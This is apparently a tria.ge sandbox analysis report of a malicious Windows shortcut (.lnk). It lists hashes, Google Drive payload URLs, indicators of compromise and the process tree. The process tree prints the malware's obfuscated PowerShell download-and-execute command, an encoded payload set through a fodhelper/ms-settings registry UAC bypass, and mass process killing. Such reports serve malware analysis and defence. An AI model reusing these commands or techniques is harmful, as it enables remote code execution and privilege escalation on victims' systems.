Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
236s -
max time network
276s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09/11/2024, 05:12
Static task
static1
Behavioral task
behavioral1
Sample
08b85c072d8fba2adda8956c1ee3e086370efd8465700fee83aea4aedb4fdc0b.lnk
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
08b85c072d8fba2adda8956c1ee3e086370efd8465700fee83aea4aedb4fdc0b.lnk
Resource
win10ltsc2021-20241023-en
General
-
Target
08b85c072d8fba2adda8956c1ee3e086370efd8465700fee83aea4aedb4fdc0b.lnk
-
Size
3KB
-
MD5
58657e9d42041b92fc229395bec9129f
-
SHA1
6dfd0ba65d061b6cd7b8e1126553a09c85f58878
-
SHA256
08b85c072d8fba2adda8956c1ee3e086370efd8465700fee83aea4aedb4fdc0b
-
SHA512
b7d527a70826e5e8813812936ad70b0bab005ee8d793ff3e940cae5aac0b78e21a5d9e9d24f9a3a885b1438d576e72de5838c404f60c5306a501249a03acc2f8
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1UUcYiqZwEV_WiJu15EZ3CoLRbDBqVoEg
Extracted
https://drive.google.com/uc?export=download&id=1yzIedgOlbPjUc006zFjrkRkJWDbchF0u
Signatures
-
Blocklisted process makes network request 8 IoCs
flow pid Process 4 4576 powershell.exe 8 4576 powershell.exe 29 4684 powershell.exe 30 4684 powershell.exe 43 1552 powershell.exe 44 1552 powershell.exe 57 4576 powershell.exe 59 4576 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation SystemSettings.Security.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 7 IoCs
pid Process 1780 SystemProcessHost.SystemProcesses 2804 SystemProcessHost.SystemProcesses.exe 2112 Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas 4888 SystemSettings.Security 1892 Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas.exe 3428 SystemSettings.Security 4208 SystemSettings.Security.exe -
pid Process 1552 powershell.exe 4576 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
flow ioc 57 drive.google.com 60 drive.google.com 62 drive.google.com 3 drive.google.com 4 drive.google.com 29 drive.google.com 43 drive.google.com 56 drive.google.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2112 Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas 1892 Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 64 IoCs
pid Process 3964 taskkill.exe 4668 taskkill.exe 4132 taskkill.exe 2300 taskkill.exe 3988 taskkill.exe 3028 taskkill.exe 1540 taskkill.exe 4000 taskkill.exe 1948 taskkill.exe 1132 taskkill.exe 2620 taskkill.exe 4460 taskkill.exe 4904 taskkill.exe 1072 taskkill.exe 2700 taskkill.exe 3892 taskkill.exe 4140 taskkill.exe 4624 taskkill.exe 4420 taskkill.exe 2372 taskkill.exe 1544 taskkill.exe 396 taskkill.exe 3572 taskkill.exe 1944 taskkill.exe 3428 taskkill.exe 3892 taskkill.exe 2204 taskkill.exe 1860 taskkill.exe 2112 taskkill.exe 4712 taskkill.exe 4924 taskkill.exe 4804 taskkill.exe 3704 taskkill.exe 3452 taskkill.exe 2560 taskkill.exe 3356 taskkill.exe 1132 taskkill.exe 2460 taskkill.exe 2280 taskkill.exe 1876 taskkill.exe 2304 taskkill.exe 2376 taskkill.exe 4920 taskkill.exe 3944 taskkill.exe 2340 taskkill.exe 1600 taskkill.exe 1608 taskkill.exe 4264 taskkill.exe 4676 taskkill.exe 2668 taskkill.exe 5080 taskkill.exe 1936 taskkill.exe 3028 taskkill.exe 4536 taskkill.exe 1064 taskkill.exe 4800 taskkill.exe 2460 taskkill.exe 2016 taskkill.exe 2232 taskkill.exe 4132 taskkill.exe 3040 taskkill.exe 4336 taskkill.exe 4444 taskkill.exe 2144 taskkill.exe -
Modifies registry class 17 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\CurVer\ = ".alecar" reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\.alecar\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\CurVer reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\.alecar\Shell\Open\command\ = "C:\\Users\\Public\\Music\\SystemProcessHost.SystemProcesses powershell -exEC byPASs -enc JAB0AHMAawBsAHIAZQB4AFIAZwA3AHoAcgBLAFcANABmAFUAdQBRADMAOABmADQAOQB3AE8AdQB0AHgANAA0AGIATAA4ADQAMQBxADcAegA5AHAAQQBEAEcAZwAwAFgAbAA0AFEAaQBuADEARABTAFYATwBPAEQAMgBIAGUASgBkAEsAUwBCAFYAMQA1AGMAVgBOADkANQBLAEsAOAAwADQAMQBZAGEAawBGAHoANgBlAHgAbQAzAHUAOAB2AEQANwBLADgATABPAGcASABHAE4AdwBVAGMAMQAxAGEANQBmADYAMgAwADgAQQBKADMAMABOAEQAYgA1ADMATgAyAHkANgA0AEgARgBEAEQAMgBuAFgANAA3ADEAVwBxAEwAcQA3AEIATQA2ADgAegBIAHkAcgB6AG0ASABWAFIARgBZAFgAOAAzAGQAbAAyAEkAVgBYAHUASQB2ADEAWgBFAEcANQBqAFAAZgBmADMAYQB0AEoAOQBXADkAVABCADQAcgB6ADIAaAA5ADUAMgBSAEEARQA5ADcAaABDAHAAMABnADgAMwB6ADcAQwBuADAANwBqADUAUwA4ADgARQBWAHMANQBnAHIAdgBqADIANQA2AFoAWQBFAEoATQBJADcARABoAGYANwA3AFoAaAA3ADIAOABkAEIAMwA1AG8AUgBPADUAdQAwAE8AUQBXADAANgAyAHcAMwBTAGEAMgBoAFEAOQBsAHkAUQBPAG8AMABYAFkAVQBHAFYAOAA3AHAAVQBZADUAdQBmAGwAQQB6ADAAWgBUAGUAeABKAEkANQAxAHMASgA5AEkATAB3AHUAVQBCAFUAeABWADEANwA3ADkAUQBlADIAZAB0AHYAeAAwAEgAMAA2ADQAMQBLAEYAdwBDAD0AJwBJAG4AJwArACcAVgBvACcAKwAnAGsAJwArACcARQAtAEUAeAAnACsAJwBQACcAKwAnAHIAZQAnACsAJwBTAHMAJwArACcASQBvACcAKwAnAG4AJwA7AHMAYQBsACAAdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAgACQAdABzAGsAbAByAGUAeABSAGcANwB6AHIASwBXADQAZgBVAHUAUQAzADgAZgA0ADkAdwBPAHUAdAB4ADQANABiAEwAOAA0ADEAcQA3AHoAOQBwAEEARABHAGcAMABYAGwANABRAGkAbgAxAEQAUwBWAE8ATwBEADIASABlAEoAZABLAFMAQgBWADEANQBjAFYATgA5ADUASwBLADgAMAA0ADEAWQBhAGsARgB6ADYAZQB4AG0AMwB1ADgAdgBEADcASwA4AEwATwBnAEgARwBOAHcAVQBjADEAMQBhADUAZgA2ADIAMAA4AEEASgAzADAATgBEAGIANQAzAE4AMgB5ADYANABIAEYARABEADIAbgBYADQANwAxAFcAcQBMAHEANwBCAE0ANgA4AHoASAB5AHIAegBtAEgAVgBSAEYAWQBYADgAMwBkAGwAMgBJAFYAWAB1AEkAdgAxAFoARQBHADUAagBQAGYAZgAzAGEAdABKADkAVwA5AFQAQgA0AHIAegAyAGgAOQA1ADIAUgBBAEUAOQA3AGgAQwBwADAAZwA4ADMAegA3AEMAbgAwADcAagA1AFMAOAA4AEUAVgBzADUAZwByAHYAagAyADUANgBaAFkARQBKAE0ASQA3AEQAaABmADcANwBaAGgANwAyADgAZABCADMANQBvAFIATwA1AHUAMABPAFEAVwAwADYAMgB3ADMAUwBhADIAaABRADkAbAB5AFEATwBvADAAWABZAFUARwBWADgANwBwAFUAWQA1AHUAZgBsAEEAegAwAFoAVABlAHgASgBJADUAMQBzAEoAOQBJAEwAdwB1AFUAQgBVAHgAVgAxADcANwA5AFEAZQAyAGQAdAB2AHgAMABIADAANgA0ADEASwBGAHcAQwA7ACQAcAB6AGgAaABxAGQAdwBsAD0AdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAoAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAKAAkACgAJAAoACcAKABuAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB3AC0AbwBiAGoAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AGMAdAAgAFMAeQBzAHQAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AG0ALgBOAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB0AC4AVwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAYgBDAGwAaQB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAbgB0ACkALgBEAG8AcABwADgAMwA4ADMAagBuAEQAdAByAGkAbgBnACgAJwAnAGgASgB1AGQAMgBOAEIASQBkAHIAaQB2AFAAUABzADgAMgA4AEQARgBTAC4AZwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBnAGwAUABQAHMAOAAyADgARABGAFMALgBjAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAG0ALwB1AGMAPwBQAFAAcwA4ADIAOABEAEYAUwB4AHAAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAcgB0AD0AZABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQB3AG4AbABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBhAGQAJgBpAGQAPQAxAHkAegBJAFAAUABzADgAMgA4AEQARgBTAGQAZwBPAGwAYgBQAGoAVQBjADAAMAA2AHoARgBqAHIAawBSAGsASgBXAEQAYgBjAGgARgAwAHUAJwAnAC4AUgBlAHAAbABhAGMAZQAoACcAJwBKAHUAZAAyAE4AQgBJACcAJwAsACcAJwB0AHQAcABzADoALwAvACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAJwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQAnACcALAAnACcAbwAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnACcAUABQAHMAOAAyADgARABGAFMAJwAnACwAIAAnACcAZQAnACcAKQApACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwAnACwAIAAnAGUAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAcABwADgAMwA4ADMAagBuAEQAJwAsACAAJwB3AG4AbABvAGEAZABTACcAKQApACkAKQA=" reg.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\CurVer reg.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings fodhelper.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\.alecar reg.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\.alecar\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\.alecar\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\.alecar\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\.alecar reg.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\.alecar\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\.alecar\Shell\Open reg.exe -
Modifies registry key 1 TTPs 4 IoCs
pid Process 3608 reg.exe 2320 reg.exe 2560 reg.exe 4444 reg.exe -
Opens file in notepad (likely ransom note) 3 IoCs
pid Process 4712 NOTEPAD.EXE 2244 NOTEPAD.EXE 396 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 4576 powershell.exe 4576 powershell.exe 1552 powershell.exe 1552 powershell.exe 1552 powershell.exe 4424 PoWeRsHeLl.exe 4888 SystemSettings.Security 4424 PoWeRsHeLl.exe 4888 SystemSettings.Security 1032 PoWeRsHeLl.exe 1032 PoWeRsHeLl.exe 3428 SystemSettings.Security 3428 SystemSettings.Security 4208 SystemSettings.Security.exe 4208 SystemSettings.Security.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4576 powershell.exe Token: SeDebugPrivilege 1552 powershell.exe Token: SeDebugPrivilege 4264 taskkill.exe Token: SeDebugPrivilege 4676 taskkill.exe Token: SeDebugPrivilege 4132 taskkill.exe Token: SeDebugPrivilege 3120 taskkill.exe Token: SeDebugPrivilege 4420 taskkill.exe Token: SeDebugPrivilege 4428 taskkill.exe Token: SeDebugPrivilege 3356 taskkill.exe Token: SeDebugPrivilege 3988 taskkill.exe Token: SeDebugPrivilege 2432 taskkill.exe Token: SeDebugPrivilege 3892 taskkill.exe Token: SeDebugPrivilege 2668 taskkill.exe Token: SeDebugPrivilege 2460 taskkill.exe Token: SeDebugPrivilege 2620 taskkill.exe Token: SeDebugPrivilege 4460 taskkill.exe Token: SeDebugPrivilege 5080 taskkill.exe Token: SeDebugPrivilege 4904 taskkill.exe Token: SeDebugPrivilege 2112 taskkill.exe Token: SeDebugPrivilege 2372 taskkill.exe Token: SeDebugPrivilege 1544 taskkill.exe Token: SeDebugPrivilege 1072 taskkill.exe Token: SeDebugPrivilege 4920 taskkill.exe Token: SeDebugPrivilege 3252 taskkill.exe Token: SeDebugPrivilege 2300 taskkill.exe Token: SeDebugPrivilege 2700 taskkill.exe Token: SeDebugPrivilege 3016 taskkill.exe Token: SeDebugPrivilege 4676 taskkill.exe Token: SeDebugPrivilege 396 taskkill.exe Token: SeDebugPrivilege 3572 taskkill.exe Token: SeDebugPrivilege 4712 taskkill.exe Token: SeDebugPrivilege 1944 taskkill.exe Token: SeDebugPrivilege 4924 taskkill.exe Token: SeDebugPrivilege 1132 taskkill.exe Token: SeDebugPrivilege 3988 taskkill.exe Token: SeDebugPrivilege 4120 taskkill.exe Token: SeDebugPrivilege 3892 taskkill.exe Token: SeDebugPrivilege 2668 taskkill.exe Token: SeDebugPrivilege 2460 taskkill.exe Token: SeDebugPrivilege 3904 taskkill.exe Token: SeDebugPrivilege 3028 taskkill.exe Token: SeDebugPrivilege 1972 taskkill.exe Token: SeDebugPrivilege 4140 taskkill.exe Token: SeDebugPrivilege 2280 taskkill.exe Token: SeDebugPrivilege 2376 taskkill.exe Token: SeDebugPrivilege 2800 taskkill.exe Token: SeDebugPrivilege 4424 taskkill.exe Token: SeDebugPrivilege 984 taskkill.exe Token: SeDebugPrivilege 2456 taskkill.exe Token: SeDebugPrivilege 4920 taskkill.exe Token: SeDebugPrivilege 3492 taskkill.exe Token: SeDebugPrivilege 4012 taskkill.exe Token: SeDebugPrivilege 1092 taskkill.exe Token: SeDebugPrivilege 2016 taskkill.exe Token: SeDebugPrivilege 2232 taskkill.exe Token: SeDebugPrivilege 4644 taskkill.exe Token: SeDebugPrivilege 1540 taskkill.exe Token: SeDebugPrivilege 1620 taskkill.exe Token: SeDebugPrivilege 4000 taskkill.exe Token: SeDebugPrivilege 4132 taskkill.exe Token: SeDebugPrivilege 4756 taskkill.exe Token: SeDebugPrivilege 3964 taskkill.exe Token: SeDebugPrivilege 4624 taskkill.exe Token: SeDebugPrivilege 4168 taskkill.exe -
Suspicious use of SetWindowsHookEx 19 IoCs
pid Process 4672 OpenWith.exe 4672 OpenWith.exe 4672 OpenWith.exe 4672 OpenWith.exe 4672 OpenWith.exe 4672 OpenWith.exe 4672 OpenWith.exe 4672 OpenWith.exe 4672 OpenWith.exe 4672 OpenWith.exe 4672 OpenWith.exe 4672 OpenWith.exe 4672 OpenWith.exe 4672 OpenWith.exe 4672 OpenWith.exe 4672 OpenWith.exe 4672 OpenWith.exe 4672 OpenWith.exe 4672 OpenWith.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 3720 wrote to memory of 4576 3720 cmd.exe 84 PID 3720 wrote to memory of 4576 3720 cmd.exe 84 PID 4576 wrote to memory of 1372 4576 powershell.exe 97 PID 4576 wrote to memory of 1372 4576 powershell.exe 97 PID 1372 wrote to memory of 2244 1372 cmd.exe 98 PID 1372 wrote to memory of 2244 1372 cmd.exe 98 PID 4576 wrote to memory of 2560 4576 powershell.exe 105 PID 4576 wrote to memory of 2560 4576 powershell.exe 105 PID 4576 wrote to memory of 4444 4576 powershell.exe 106 PID 4576 wrote to memory of 4444 4576 powershell.exe 106 PID 4576 wrote to memory of 2804 4576 powershell.exe 107 PID 4576 wrote to memory of 2804 4576 powershell.exe 107 PID 2804 wrote to memory of 1780 2804 fodhelper.exe 108 PID 2804 wrote to memory of 1780 2804 fodhelper.exe 108 PID 1780 wrote to memory of 4684 1780 SystemProcessHost.SystemProcesses 109 PID 1780 wrote to memory of 4684 1780 SystemProcessHost.SystemProcesses 109 PID 4576 wrote to memory of 3608 4576 powershell.exe 114 PID 4576 wrote to memory of 3608 4576 powershell.exe 114 PID 4576 wrote to memory of 2320 4576 powershell.exe 115 PID 4576 wrote to memory of 2320 4576 powershell.exe 115 PID 4672 wrote to memory of 396 4672 OpenWith.exe 214 PID 4672 wrote to memory of 396 4672 OpenWith.exe 214 PID 4576 wrote to memory of 3608 4576 powershell.exe 234 PID 4576 wrote to memory of 3608 4576 powershell.exe 234 PID 3608 wrote to memory of 2112 3608 cmd.exe 235 PID 3608 wrote to memory of 2112 3608 cmd.exe 235 PID 2112 wrote to memory of 4424 2112 Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas 236 PID 2112 wrote to memory of 4424 2112 Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas 236 PID 2112 wrote to memory of 4888 2112 Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas 238 PID 2112 wrote to memory of 4888 2112 Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas 238 PID 1892 wrote to memory of 1032 1892 Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas.exe 245 PID 1892 wrote to memory of 1032 1892 Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas.exe 245 PID 1892 wrote to memory of 3428 1892 Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas.exe 247 PID 1892 wrote to memory of 3428 1892 Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas.exe 247
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\08b85c072d8fba2adda8956c1ee3e086370efd8465700fee83aea4aedb4fdc0b.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /""W 0""1 ""-Non""Inte""ract""ive ""-No""Prof""ile ""-Exe""cut""ionPo""licy ""Byp""ass $kZ788UmuOaf8KSE4Z2z1X6JZe3y3Vjtpe1NrZt5Y37yS32l2QZY34a0xrE0bgk9Z0CSrya87I46tBE9T37wyHxdL4gcbIRpe35OVT7M8fVtfDmDYctLDm2Bv6Cf0LDl7QioQk4KvVVb4CSA8U6wS61gEWbVMm14jtFYSx4S5i0sFjeC3fd4KF6XtKMek3Iig25iUp7fz9W1PaK650qbQkZx349PFYI7BkF4s2pS56jddf5JEZvV751FiZk17tm0j5A6dp70sFbvpg8hNNw3kI6wI7TCIktLZrXkPMlK8nixxPGN11UIiIf169df177gNe2AfYzFm4='i""Ex';sal uzbekistanac $kZ788UmuOaf8KSE4Z2z1X6JZe3y3Vjtpe1NrZt5Y37yS32l2QZY34a0xrE0bgk9Z0CSrya87I46tBE9T37wyHxdL4gcbIRpe35OVT7M8fVtfDmDYctLDm2Bv6Cf0LDl7QioQk4KvVVb4CSA8U6wS61gEWbVMm14jtFYSx4S5i0sFjeC3fd4KF6XtKMek3Iig25iUp7fz9W1PaK650qbQkZx349PFYI7BkF4s2pS56jddf5JEZvV751FiZk17tm0j5A6dp70sFbvpg8hNNw3kI6wI7TCIktLZrXkPMlK8nixxPGN11UIiIf169df177gNe2AfYzFm4;uzbekistanac(uzbekistanac($($('(n""QNVrd3W""2GjJK36w-oBJQ""NVrd3W2G""jJK36ct sY""stQNV""rd3W""2GjJK36m.NQNVrd3""W2GjJK36t.WQN""Vrd3W2GjJK36bcLi""QNVrd3W2GjJ""K36nt"")"".dos""2Wr6qQRtR""InG(''hfTdH8C6drivz2Wr6qQR.gs97YMGcyg0WCrs97YMGcyg0WCrglz2Wr6qQR.cs97YMGcyg0WCrm/uc?z2Wr6qQRxps97YMGcyg0WCrrt=ds97YMGcyg0WCrwnls97YMGcyg0WCrad&id=1UUcYiqZwEV_WiJu15EZ3Cs97YMGcyg0WCrLRbDBqVs97YMGcyg0WCrEg''.rEpLACe(''fTdH8C6'',''ttps://'').rEpLACe(''s97YMGcyg0WCr'',''o'').rEpLACe(''z2Wr6qQR'', ''e''))').rEpLACe('QNVrd3W2GjJK36', 'e').rEpLACe('s2W""r6qQR', 'wnlo""adS'))))2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start C:/ProgramData/VipPassword.txt3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\VipPassword.txt4⤵
- Opens file in notepad (likely ransom note)
PID:2244
-
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKCU\Software\Classes\.alecar\Shell\Open\command /d "C:\Users\Public\Music\SystemProcessHost.SystemProcesses powershell -exEC byPASs -enc JAB0AHMAawBsAHIAZQB4AFIAZwA3AHoAcgBLAFcANABmAFUAdQBRADMAOABmADQAOQB3AE8AdQB0AHgANAA0AGIATAA4ADQAMQBxADcAegA5AHAAQQBEAEcAZwAwAFgAbAA0AFEAaQBuADEARABTAFYATwBPAEQAMgBIAGUASgBkAEsAUwBCAFYAMQA1AGMAVgBOADkANQBLAEsAOAAwADQAMQBZAGEAawBGAHoANgBlAHgAbQAzAHUAOAB2AEQANwBLADgATABPAGcASABHAE4AdwBVAGMAMQAxAGEANQBmADYAMgAwADgAQQBKADMAMABOAEQAYgA1ADMATgAyAHkANgA0AEgARgBEAEQAMgBuAFgANAA3ADEAVwBxAEwAcQA3AEIATQA2ADgAegBIAHkAcgB6AG0ASABWAFIARgBZAFgAOAAzAGQAbAAyAEkAVgBYAHUASQB2ADEAWgBFAEcANQBqAFAAZgBmADMAYQB0AEoAOQBXADkAVABCADQAcgB6ADIAaAA5ADUAMgBSAEEARQA5ADcAaABDAHAAMABnADgAMwB6ADcAQwBuADAANwBqADUAUwA4ADgARQBWAHMANQBnAHIAdgBqADIANQA2AFoAWQBFAEoATQBJADcARABoAGYANwA3AFoAaAA3ADIAOABkAEIAMwA1AG8AUgBPADUAdQAwAE8AUQBXADAANgAyAHcAMwBTAGEAMgBoAFEAOQBsAHkAUQBPAG8AMABYAFkAVQBHAFYAOAA3AHAAVQBZADUAdQBmAGwAQQB6ADAAWgBUAGUAeABKAEkANQAxAHMASgA5AEkATAB3AHUAVQBCAFUAeABWADEANwA3ADkAUQBlADIAZAB0AHYAeAAwAEgAMAA2ADQAMQBLAEYAdwBDAD0AJwBJAG4AJwArACcAVgBvACcAKwAnAGsAJwArACcARQAtAEUAeAAnACsAJwBQACcAKwAnAHIAZQAnACsAJwBTAHMAJwArACcASQBvACcAKwAnAG4AJwA7AHMAYQBsACAAdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAgACQAdABzAGsAbAByAGUAeABSAGcANwB6AHIASwBXADQAZgBVAHUAUQAzADgAZgA0ADkAdwBPAHUAdAB4ADQANABiAEwAOAA0ADEAcQA3AHoAOQBwAEEARABHAGcAMABYAGwANABRAGkAbgAxAEQAUwBWAE8ATwBEADIASABlAEoAZABLAFMAQgBWADEANQBjAFYATgA5ADUASwBLADgAMAA0ADEAWQBhAGsARgB6ADYAZQB4AG0AMwB1ADgAdgBEADcASwA4AEwATwBnAEgARwBOAHcAVQBjADEAMQBhADUAZgA2ADIAMAA4AEEASgAzADAATgBEAGIANQAzAE4AMgB5ADYANABIAEYARABEADIAbgBYADQANwAxAFcAcQBMAHEANwBCAE0ANgA4AHoASAB5AHIAegBtAEgAVgBSAEYAWQBYADgAMwBkAGwAMgBJAFYAWAB1AEkAdgAxAFoARQBHADUAagBQAGYAZgAzAGEAdABKADkAVwA5AFQAQgA0AHIAegAyAGgAOQA1ADIAUgBBAEUAOQA3AGgAQwBwADAAZwA4ADMAegA3AEMAbgAwADcAagA1AFMAOAA4AEUAVgBzADUAZwByAHYAagAyADUANgBaAFkARQBKAE0ASQA3AEQAaABmADcANwBaAGgANwAyADgAZABCADMANQBvAFIATwA1AHUAMABPAFEAVwAwADYAMgB3ADMAUwBhADIAaABRADkAbAB5AFEATwBvADAAWABZAFUARwBWADgANwBwAFUAWQA1AHUAZgBsAEEAegAwAFoAVABlAHgASgBJADUAMQBzAEoAOQBJAEwAdwB1AFUAQgBVAHgAVgAxADcANwA5AFEAZQAyAGQAdAB2AHgAMABIADAANgA0ADEASwBGAHcAQwA7ACQAcAB6AGgAaABxAGQAdwBsAD0AdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAoAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAKAAkACgAJAAoACcAKABuAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB3AC0AbwBiAGoAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AGMAdAAgAFMAeQBzAHQAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AG0ALgBOAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB0AC4AVwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAYgBDAGwAaQB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAbgB0ACkALgBEAG8AcABwADgAMwA4ADMAagBuAEQAdAByAGkAbgBnACgAJwAnAGgASgB1AGQAMgBOAEIASQBkAHIAaQB2AFAAUABzADgAMgA4AEQARgBTAC4AZwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBnAGwAUABQAHMAOAAyADgARABGAFMALgBjAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAG0ALwB1AGMAPwBQAFAAcwA4ADIAOABEAEYAUwB4AHAAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAcgB0AD0AZABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQB3AG4AbABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBhAGQAJgBpAGQAPQAxAHkAegBJAFAAUABzADgAMgA4AEQARgBTAGQAZwBPAGwAYgBQAGoAV